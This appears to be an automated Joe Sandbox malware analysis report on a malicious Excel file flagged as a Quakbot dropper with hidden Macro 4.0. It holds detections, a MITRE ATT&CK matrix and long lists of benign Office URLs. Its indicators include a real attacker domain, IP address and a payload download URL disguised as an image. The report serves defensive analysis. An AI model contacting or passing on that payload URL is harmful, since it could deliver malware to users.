    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: Complaint-Copy_1984632811_11102020.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting11Path InterceptionPath InterceptionMasquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Scripting11Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Complaint-Copy_1984632811_11102020.xls19%ReversingLabsDocument-Office.Backdoor.Quakbot
    Complaint-Copy_1984632811_11102020.xls100%AviraXF/Agent.B2

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    int.boogieapparel.co.id4%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%VirustotalBrowse
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%VirustotalBrowse
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    http://int.boogieapparel.co.id/jvkuykqpn/4574557.png100%Avira URL Cloudmalware

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    int.boogieapparel.co.id
    103.253.212.59
    truefalseunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://int.boogieapparel.co.id/jvkuykqpn/4574557.pngtrue
    • Avira URL Cloud: malware
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://api.diagnosticssdf.office.com514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
      high
      https://login.microsoftonline.com/514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
        high
        https://shell.suite.office.com:1443514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
          high
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
              high
              https://cdn.entity.514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                high
                https://wus2-000.contentsync.514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://clients.config.office.net/user/v1.0/tenantassociationkey514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                    high
                    https://powerlift.acompli.net514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v1514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                      high
                      https://cortana.ai514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                high
                                https://api.aadrm.com/514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                      high
                                      https://cr.office.com514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControl514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/Office514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                            high
                                            https://graph.ppe.windows.net514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptionevents514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.net514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.com514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/work514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplate514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://wus2-000.pagecontentsync.514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.com514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplate514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetect514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.ms514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groups514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                            high
                                                            https://graph.windows.net514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.com514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/api514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetect514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.json514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                        high
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspx514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                    high
                                                                                    https://management.azure.com514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                      high
                                                                                      https://outlook.office365.com514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                        high
                                                                                        https://incidents.diagnostics.office.com514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                          high
                                                                                          https://clients.config.office.net/user/v1.0/ios514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                            high
                                                                                            https://insertmedia.bing.office.net/odc/insertmedia514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                              high
                                                                                              https://o365auditrealtimeingestion.manage.office.com514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                high
                                                                                                https://outlook.office365.com/api/v1.0/me/Activities514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                  high
                                                                                                  https://api.office.net514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                    high
                                                                                                    https://incidents.diagnosticssdf.office.com514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                      high
                                                                                                      https://asgsmsproxyapi.azurewebsites.net/514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                      • 0%, Virustotal, Browse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://clients.config.office.net/user/v1.0/android/policies514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                        high
                                                                                                        https://entitlement.diagnostics.office.com514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                          high
                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                            high
                                                                                                            https://autodiscover-s.outlook.com514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                              high
                                                                                                              https://storage.live.com/clientlogs/uploadlocation514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                                high
                                                                                                                https://templatelogging.office.com/client/log514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                                  high
                                                                                                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                                    high
                                                                                                                    https://management.azure.com/514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                                      high
                                                                                                                      https://ncus-000.contentsync.514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://login.windows.net/common/oauth2/authorize514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                                        high
                                                                                                                        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://graph.windows.net/514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                                          high
                                                                                                                          https://api.powerbi.com/beta/myorg/imports514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                                            high
                                                                                                                            https://devnull.onenote.com514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                                              high
                                                                                                                              https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                                                high
                                                                                                                                https://messaging.office.com/514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://augloop.office.com/v2514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://skyapi.live.net/Activity/514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://clients.config.office.net/user/v1.0/mac514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.o365filtering.com514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://onedrive.live.com514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://ovisualuiapp.azurewebsites.net/pbiagave/514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://visio.uservoice.com/forums/368202-visio-on-devices514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://directory.services.514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://login.windows-ppe.net/common/oauth2/authorize514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://loki.delve.office.com/api/v1/configuration/officewin32/514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://onedrive.live.com/embed?514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://augloop.office.com514913CD-09DC-49EE-A35E-AC55604C79F5.0.drfalse
                                                                                                                                                      high

                                                                                                                                                      Contacted IPs

                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                      Public

                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                      103.253.212.59
                                                                                                                                                      unknownIndonesia
                                                                                                                                                      58487RUMAHWEB-AS-IDRumahwebIndonesiaCVIDfalse

                                                                                                                                                      General Information

                                                                                                                                                      Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                      Analysis ID:321328
                                                                                                                                                      Start date:20.11.2020
                                                                                                                                                      Start time:20:59:01
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 3m 54s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:full
                                                                                                                                                      Sample file name:Complaint-Copy_1984632811_11102020.xls
                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                      Run name:Potential for more IOCs and behavior
                                                                                                                                                      Number of analysed new started processes analysed:20
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal84.expl.evad.winXLS@1/6@1/1
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Adjust boot time
                                                                                                                                                      • Enable AMSI
                                                                                                                                                      • Found application associated with file extension: .xls
                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                      • Scroll down
                                                                                                                                                      • Close Viewer
                                                                                                                                                      Warnings:
                                                                                                                                                      Show All
                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 52.109.76.6, 52.109.76.36, 52.109.76.34, 51.11.168.160, 52.255.188.83, 52.147.198.201, 2.18.68.82, 20.54.26.129, 205.185.216.42, 205.185.216.10, 92.122.213.194, 92.122.213.247
